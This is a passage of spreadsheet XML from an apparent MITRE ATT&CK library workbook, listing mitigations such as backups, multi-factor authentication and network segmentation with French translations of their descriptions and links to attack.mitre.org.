      <c r="B12" t="s">
        <v>2002</v>
      </c>
      <c r="C12" t="s">
        <v>1977</v>
      </c>
      <c r="D12" t="s">
        <v>1971</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2003</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>2687</v>
      </c>
      <c r="G12" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez le contrôle de compte d’utilisateur Windows pour réduire le risque que des adversaires obtiennent un accès élevé aux processus.
https://attack.mitre.org/mitigations/M1052</v>
      </c>
    </row>
    <row r="13" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>2004</v>
      </c>
      <c r="B13" t="s">
        <v>2005</v>
      </c>
      <c r="C13" t="s">
        <v>1977</v>
      </c>
      <c r="D13" t="s">
        <v>1971</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2006</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>2688</v>
      </c>
      <c r="G13" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Apportez des modifications de configuration liées au système d’exploitation ou à une caractéristique commune du système d’exploitation qui entraînent un renforcement du système par rapport aux techniques.
https://attack.mitre.org/mitigations/M1028</v>
      </c>
    </row>
    <row r="14" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>2007</v>
      </c>
      <c r="B14" t="s">
        <v>2008</v>
      </c>
      <c r="C14" t="s">
        <v>2009</v>
      </c>
      <c r="D14" t="s">
        <v>1971</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>2010</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>2689</v>
      </c>
      <c r="G14" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez et stockez des sauvegardes de données à partir des systèmes de l’utilisateur final et des serveurs critiques. Assurez-vous que les systèmes de sauvegarde et de stockage sont renforcés et séparés du réseau de l’entreprise afin d’éviter toute compromission.
https://attack.mitre.org/mitigations/M1053</v>
      </c>
    </row>
    <row r="15" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>2011</v>
      </c>
      <c r="B15" t="s">
        <v>2012</v>
      </c>
      <c r="C15" t="s">
        <v>1977</v>
      </c>
      <c r="D15" t="s">
        <v>1971</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>2013</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>2690</v>
      </c>
      <c r="G15" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Bloquer l’exécution de code sur un système par le biais du contrôle d’application et/ou du blocage de script.
https://attack.mitre.org/mitigations/M1038</v>
      </c>
    </row>
    <row r="16" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>2014</v>
      </c>
      <c r="B16" t="s">
        <v>2015</v>
      </c>
      <c r="C16" t="s">
        <v>1977</v>
      </c>
      <c r="D16" t="s">
        <v>1971</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2016</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>2691</v>
      </c>
      <c r="G16" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser des fonctionnalités pour empêcher l’accès réussi aux informations d’identification par des adversaires ; y compris le blocage des formes de dumping d’informations d’identification.
https://attack.mitre.org/mitigations/M1043</v>
      </c>
    </row>
    <row r="17" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>2017</v>
      </c>
      <c r="B17" t="s">
        <v>444</v>
      </c>
      <c r="C17" t="s">
        <v>1977</v>
      </c>
      <c r="D17" t="s">
        <v>1971</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>2018</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>2228</v>
      </c>
      <c r="G17" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Renforcez l’intégrité binaire et de l’application avec la vérification de la signature numérique pour empêcher l’exécution de code non fiable.
https://attack.mitre.org/mitigations/M1045</v>
      </c>
    </row>
    <row r="18" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>2019</v>
      </c>
      <c r="B18" t="s">
        <v>2020</v>
      </c>
      <c r="C18" t="s">
        <v>1977</v>
      </c>
      <c r="D18" t="s">
        <v>1971</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>2692</v>
      </c>
      <c r="G18" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez la modification des variables d’environnement par des utilisateurs et des groupes non autorisés.
https://attack.mitre.org/mitigations/M1039</v>
      </c>
    </row>
    <row r="19" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>2022</v>
      </c>
      <c r="B19" t="s">
        <v>2023</v>
      </c>
      <c r="C19" t="s">
        <v>1970</v>
      </c>
      <c r="D19" t="s">
        <v>1971</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>2693</v>
      </c>
      <c r="G19" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez une stratégie de prévention des pertes de données (DLP) pour catégoriser les données sensibles, identifier les formats de données indiquant des informations personnelles identifiables (PII) et limiter l’exfiltration de données sensibles. (Citation : Prévention des pertes de données PurpleSec)
https://attack.mitre.org/mitigations/M1057</v>
      </c>
    </row>
    <row r="20" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>2025</v>
      </c>
      <c r="B20" t="s">
        <v>2026</v>
      </c>
      <c r="C20" t="s">
        <v>1977</v>
      </c>
      <c r="D20" t="s">
        <v>1971</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>2027</v>
      </c>
      <c r="F20" s="2" t="s">
        <v>2694</v>
      </c>
      <c r="G20" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les processus avec des privilèges élevés qui peuvent être utilisés pour interagir avec des composants système critiques à l’aide d’un éclairage de processus protégé, de défenses anti-injection de processus ou d’autres mesures d’application de l’intégrité des processus.
https://attack.mitre.org/mitigations/M1025</v>
      </c>
    </row>
    <row r="21" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>2028</v>
      </c>
      <c r="B21" t="s">
        <v>2029</v>
      </c>
      <c r="C21" t="s">
        <v>1993</v>
      </c>
      <c r="D21" t="s">
        <v>1971</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>2030</v>
      </c>
      <c r="F21" s="2" t="s">
        <v>2695</v>
      </c>
      <c r="G21" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie consiste à associer des techniques dont l’atténuation pourrait augmenter le risque de compromission et, par conséquent, l’atténuation n’est pas recommandée.
https://attack.mitre.org/mitigations/M1055</v>
      </c>
    </row>
    <row r="22" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>2031</v>
      </c>
      <c r="B22" t="s">
        <v>2032</v>
      </c>
      <c r="C22" t="s">
        <v>1993</v>
      </c>
      <c r="D22" t="s">
        <v>1971</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>2033</v>
      </c>
      <c r="F22" s="2" t="s">
        <v>2696</v>
      </c>
      <c r="G22" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Cette catégorie est utilisée pour toutes les activités d’atténuation applicables qui s’appliquent aux techniques mises en œuvre avant qu’un adversaire n’obtienne l’accès initial, telles que les techniques de reconnaissance et de développement des ressources.
https://attack.mitre.org/mitigations/M1056</v>
      </c>
    </row>
    <row r="23" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>2034</v>
      </c>
      <c r="B23" t="s">
        <v>2035</v>
      </c>
      <c r="C23" t="s">
        <v>1977</v>
      </c>
      <c r="D23" t="s">
        <v>1971</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>2036</v>
      </c>
      <c r="F23" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="G23" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Interrompez et inspectez les sessions SSL/TLS pour rechercher des activités adverses dans le trafic Web chiffré.
https://attack.mitre.org/mitigations/M1020</v>
      </c>
    </row>
    <row r="24" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>2037</v>
      </c>
      <c r="B24" t="s">
        <v>2038</v>
      </c>
      <c r="C24" t="s">
        <v>1977</v>
      </c>
      <c r="D24" t="s">
        <v>1971</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>2039</v>
      </c>
      <c r="F24" s="2" t="s">
        <v>2697</v>
      </c>
      <c r="G24" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des méthodes sécurisées pour démarrer un système et vérifier l’intégrité du système d’exploitation et des mécanismes de chargement.
https://attack.mitre.org/mitigations/M1046</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>2040</v>
      </c>
      <c r="B25" t="s">
        <v>2041</v>
      </c>
      <c r="C25" t="s">
        <v>1977</v>
      </c>
      <c r="D25" t="s">
        <v>1971</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="F25" s="2" t="s">
        <v>2698</v>
      </c>
      <c r="G25" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Établissez des canaux de communication hors bande sécurisés pour assurer la continuité des communications critiques en cas d’incidents de sécurité, d’attaques d’intégrité des données ou de défaillances de communication au sein du réseau. La communication hors bande fait référence à l’utilisation d’un autre chemin de communication distinct qui ne dépend pas de l’infrastructure du réseau principal potentiellement compromise. Cette méthode peut inclure des applications de messagerie sécurisées, des lignes téléphoniques cryptées, des communications par satellite ou des systèmes de communication d’urgence dédiés. L’exploitation de ces canaux alternatifs réduit le risque que les adversaires interceptent, perturbent ou altèrent les communications sensibles et permet de coordonner une réponse efficace aux incidents. (Citation : TrustedSec OOB Communications)(Citation : Publication spéciale du NIST 800-53 Révision 5)
https://attack.mitre.org/mitigations/M1060</v>
      </c>
    </row>
    <row r="26" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>2043</v>
      </c>
      <c r="B26" t="s">
        <v>2044</v>
      </c>
      <c r="C26" t="s">
        <v>1977</v>
      </c>
      <c r="D26" t="s">
        <v>1971</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="F26" s="2" t="s">
        <v>2699</v>
      </c>
      <c r="G26" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Concevez des sections du réseau pour isoler les systèmes, les fonctions ou les ressources critiques. Utilisez la segmentation physique et logique pour empêcher l’accès à des systèmes et des informations potentiellement sensibles. Utilisez une DMZ pour contenir tous les services Internet qui ne doivent pas être exposés à partir du réseau interne. Configurez des instances de cloud privé virtuel (VPC) distinctes pour isoler les systèmes cloud critiques.
https://attack.mitre.org/mitigations/M1030</v>
      </c>
    </row>
    <row r="27" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>2046</v>
      </c>
      <c r="B27" t="s">
        <v>2047</v>
      </c>
      <c r="C27" t="s">
        <v>1977</v>
      </c>
      <c r="D27" t="s">
        <v>1971</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="F27" s="2" t="s">
        <v>2700</v>
      </c>
      <c r="G27" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Un programme de renseignement sur les menaces aide une organisation à générer ses propres informations et à suivre les tendances afin d’établir les priorités défensives afin d’atténuer les risques.
https://attack.mitre.org/mitigations/M1019</v>
      </c>
    </row>
    <row r="28" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>2049</v>
      </c>
      <c r="B28" t="s">
        <v>2050</v>
      </c>
      <c r="C28" t="s">
        <v>1977</v>
      </c>
      <c r="D28" t="s">
        <v>1971</v>
      </c>
      <c r="E28" s="2" t="s">
        <v>2051</v>
      </c>
      <c r="F28" s="2" t="s">
        <v>2701</v>
      </c>
      <c r="G28" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Définissez et appliquez des politiques de mot de passe sécurisées pour les comptes.
https://attack.mitre.org/mitigations/M1027</v>
      </c>
    </row>
    <row r="29" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>2052</v>
      </c>
      <c r="B29" t="s">
        <v>2053</v>
      </c>
      <c r="C29" t="s">
        <v>1970</v>
      </c>
      <c r="D29" t="s">
        <v>1971</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>2054</v>
      </c>
      <c r="F29" s="2" t="s">
        <v>2702</v>
      </c>
      <c r="G29" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les fonctionnalités pour empêcher les comportements suspects de se produire sur les systèmes de terminaux. Il peut s’agir d’un processus suspect, d’un fichier, d’un appel d’API, etc.
https://attack.mitre.org/mitigations/M1040</v>
      </c>
    </row>
    <row r="30" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>2055</v>
      </c>
      <c r="B30" t="s">
        <v>2056</v>
      </c>
      <c r="C30" t="s">
        <v>1977</v>
      </c>
      <c r="D30" t="s">
        <v>1971</v>
      </c>
      <c r="E30" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="F30" s="2" t="s">
        <v>2703</v>
      </c>
      <c r="G30" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes utilisateurs.
https://attack.mitre.org/mitigations/M1018</v>
      </c>
    </row>
    <row r="31" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>2058</v>
      </c>
      <c r="B31" t="s">
        <v>2059</v>
      </c>
      <c r="C31" t="s">
        <v>1977</v>
      </c>
      <c r="D31" t="s">
        <v>1971</v>
      </c>
      <c r="E31" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="F31" s="2" t="s">
        <v>2704</v>
      </c>
      <c r="G31" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’accès en définissant des autorisations de répertoire et de fichier qui ne sont pas spécifiques aux utilisateurs ou aux comptes privilégiés.
https://attack.mitre.org/mitigations/M1022</v>
      </c>
    </row>
    <row r="32" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>2061</v>
      </c>
      <c r="B32" t="s">
        <v>2062</v>
      </c>
      <c r="C32" t="s">
        <v>1977</v>
      </c>
      <c r="D32" t="s">
        <v>1971</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>2063</v>
      </c>
      <c r="F32" s="2" t="s">
        <v>2705</v>
      </c>
      <c r="G32" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Gérez la création, la modification, l’utilisation et les autorisations associées aux comptes privilégiés, y compris SYSTEM et root.
https://attack.mitre.org/mitigations/M1026</v>
      </c>
    </row>
    <row r="33" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>2064</v>
      </c>
      <c r="B33" t="s">
        <v>2065</v>
      </c>
      <c r="C33" t="s">
        <v>1977</v>
      </c>
      <c r="D33" t="s">
        <v>1971</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>2066</v>
      </c>
      <c r="F33" s="2" t="s">
        <v>2706</v>
      </c>
      <c r="G33" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Restreindre la possibilité de modifier certaines ruches ou clés dans le registre Windows.
https://attack.mitre.org/mitigations/M1024</v>
      </c>
    </row>
    <row r="34" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>2067</v>
      </c>
      <c r="B34" t="s">
        <v>2068</v>
      </c>
      <c r="C34" t="s">
        <v>1970</v>
      </c>
      <c r="D34" t="s">
        <v>1971</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>2069</v>
      </c>
      <c r="F34" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="G34" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez des signatures ou des heuristiques pour détecter les logiciels malveillants.
https://attack.mitre.org/mitigations/M1049</v>
      </c>
    </row>
    <row r="35" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>2070</v>
      </c>
      <c r="B35" t="s">
        <v>2071</v>
      </c>
      <c r="C35" t="s">
        <v>1977</v>
      </c>
      <c r="D35" t="s">
        <v>1971</v>
      </c>
      <c r="E35" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="F35" s="2" t="s">
        <v>2707</v>
      </c>
      <c r="G35" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utiliser deux preuves ou plus pour s’authentifier auprès d’un système ; tels que le nom d’utilisateur et le mot de passe en plus d’un jeton provenant d’une carte à puce physique ou d’un générateur de jetons.
https://attack.mitre.org/mitigations/M1032</v>
      </c>
    </row>
    <row r="36" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>2073</v>
      </c>
      <c r="B36" t="s">
        <v>2074</v>
      </c>
      <c r="C36" t="s">
        <v>1977</v>
      </c>
      <c r="D36" t="s">
        <v>1971</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="F36" s="2" t="s">
        <v>2708</v>
      </c>
      <c r="G36" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettre en œuvre des modifications de configuration du logiciel (autre que le système d’exploitation) pour atténuer les risques de sécurité associés au fonctionnement du logiciel.
https://attack.mitre.org/mitigations/M1054</v>
      </c>
    </row>
    <row r="37" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>2076</v>
      </c>
      <c r="B37" t="s">
        <v>2077</v>
      </c>
      <c r="C37" t="s">
        <v>1977</v>
      </c>
      <c r="D37" t="s">
        <v>1971</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>2078</v>
      </c>
      <c r="F37" s="2" t="s">
        <v>2709</v>
      </c>
      <c r="G37" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Limitez l’exécution de code à un environnement virtuel sur ou en transit vers un système de point de terminaison.
https://attack.mitre.org/mitigations/M1048</v>
      </c>
    </row>
    <row r="38" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>2079</v>
      </c>
      <c r="B38" t="s">
        <v>2080</v>
      </c>
      <c r="C38" t="s">
        <v>1977</v>
      </c>
      <c r="D38" t="s">
        <v>1971</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>2081</v>
      </c>
      <c r="F38" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="G38" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuer des audits ou des analyses des systèmes, des autorisations, des logiciels non sécurisés, des configurations non sécurisées, etc. pour identifier les faiblesses potentielles.
https://attack.mitre.org/mitigations/M1047</v>
      </c>
    </row>
    <row r="39" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>2082</v>
      </c>
      <c r="B39" t="s">
        <v>2083</v>
      </c>
      <c r="C39" t="s">
        <v>1970</v>
      </c>
      <c r="D39" t="s">
        <v>1971</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="F39" s="2" t="s">
        <v>2710</v>
      </c>
      <c r="G39" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Utilisez les capacités pour détecter et bloquer les conditions qui peuvent conduire à ou être indicatives d’un exploit logiciel.
https://attack.mitre.org/mitigations/M1050</v>
      </c>
    </row>
    <row r="40" spans="1:7" ht="144" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>2085</v>
      </c>
      <c r="B40" t="s">
        <v>2086</v>
      </c>
      <c r="C40" t="s">
        <v>1977</v>
      </c>
      <c r="D40" t="s">
        <v>1971</v>
      </c>
      <c r="E40" s="2" t="s">
        <v>2087</v>
      </c>
      <c r="F40" s="2" t="s">
        <v>2711</v>
      </c>
      <c r="G40" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Mettez en œuvre des configurations Active Directory robustes à l’aide de stratégies de groupe pour contrôler l’accès et réduire la surface d’attaque. En voici quelques exemples précis :
* Configuration du compte : utilisez des comptes de domaine provisionnés plutôt que des comptes locaux pour tirer parti des capacités de contrôle et d’audit centralisées.
* Restrictions d’ouverture de session interactive : appliquez des stratégies de groupe qui interdisent les ouvertures de session interactives pour les comptes qui ne doivent pas accéder directement aux systèmes.
* Paramètres du bureau à distance : Limitez les connexions au bureau à distance aux comptes autorisés afin d’éviter toute utilisation abusive par des adversaires.
* Comptes administratifs dédiés : créez des comptes spécialisés à l’échelle du domaine qui sont limités aux ouvertures de session interactives, mais qui peuvent effectuer des tâches spécifiques telles que les installations ou l’accès au référentiel.
* Silos d’authentification : configurez les silos d’authentification dans Active Directory pour créer des zones d’accès avec des restrictions basées sur l’appartenance au groupe de sécurité global Utilisateurs protégés. Cette configuration renforce la sécurité en appliquant des protections supplémentaires aux comptes à haut risque, limitant ainsi leur exposition aux attaques potentielles.
https://attack.mitre.org/mitigations/M1015</v>
      </c>
    </row>
    <row r="41" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A41" t="s">
        <v>2088</v>
      </c>
      <c r="B41" t="s">
        <v>2089</v>
      </c>
      <c r="C41" t="s">
        <v>1977</v>
      </c>
      <c r="D41" t="s">
        <v>1971</v>
      </c>
      <c r="E41" s="2" t="s">
        <v>2090</v>
      </c>
      <c r="F41" s="2" t="s">
        <v>2712</v>
      </c>
      <c r="G41" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Effectuez régulièrement des mises à jour logicielles pour atténuer le risque d’exploitation.
https://attack.mitre.org/mitigations/M1051</v>
      </c>
    </row>
    <row r="42" spans="1:7" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A42" t="s">
        <v>2091</v>
      </c>
      <c r="B42" t="s">
        <v>2092</v>
      </c>
      <c r="C42" t="s">
        <v>1977</v>
      </c>
      <c r="D42" t="s">
        <v>1971</v>
      </c>
      <c r="E42" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="F42" s="2" t="s">
        <v>2713</v>
      </c>
      <c r="G42" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Empêchez l’utilisation abusive des mécanismes de chargement de bibliothèque dans le système d’exploitation et les logiciels pour charger du code non fiable en configurant des mécanismes de chargement de bibliothèque appropriés et en examinant les logiciels potentiellement vulnérables.
https://attack.mitre.org/mitigations/M1044</v>
      </c>
    </row>
    <row r="43" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A43" t="s">
        <v>2094</v>
      </c>
      <c r="B43" t="s">
        <v>2095</v>
      </c>
      <c r="C43" t="s">
        <v>1977</v>
      </c>
      <c r="D43" t="s">
        <v>1971</v>
      </c>
      <c r="E43" s="2" t="s">
        <v>2096</v>
      </c>
      <c r="F43" s="2" t="s">
        <v>2714</v>
      </c>
      <c r="G43" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Supprimez ou refusez l’accès aux logiciels inutiles et potentiellement vulnérables afin d’éviter les abus par des adversaires.
https://attack.mitre.org/mitigations/M1042</v>
      </c>
    </row>
    <row r="44" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A44" t="s">
        <v>2097</v>
      </c>
      <c r="B44" t="s">
        <v>2098</v>
      </c>
      <c r="C44" t="s">
        <v>1977</v>
      </c>
      <c r="D44" t="s">
        <v>1971</v>
      </c>
      <c r="E44" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="F44" s="2" t="s">
        <v>2715</v>
      </c>
      <c r="G44" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Configurez les fonctionnalités liées à l’utilisation du compte, telles que les verrouillages de tentatives de connexion, les heures de connexion spécifiques, etc.
https://attack.mitre.org/mitigations/M1036</v>
      </c>
    </row>
    <row r="45" spans="1:7" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A45" t="s">
        <v>2100</v>
      </c>
      <c r="B45" t="s">
        <v>2101</v>
      </c>
      <c r="C45" t="s">
        <v>1977</v>
      </c>
      <c r="D45" t="s">
        <v>1971</v>
      </c>
      <c r="E45" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="F45" s="2" t="s">
        <v>2716</v>
      </c>
      <c r="G45" s="2" t="str">
        <f>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</f>
        <v>Protégez les informations sensibles grâce à un cryptage fort.
https://attack.mitre.org/mitigations/M1041</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="2" type="noConversion"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <ignoredErrors>
    <ignoredError sqref="F2:F4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library_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_meta</vt:lpstr>
      <vt:lpstr>Mitre threats_content</vt:lpstr>
      <vt:lpstr>Mitre mitigations_meta</vt:lpstr>
      <vt:lpstr>Mitre mitigations_content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2025-07-04T13:51:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T15:03:24Z</dcterms:modified>
</cp:coreProperties>
</file>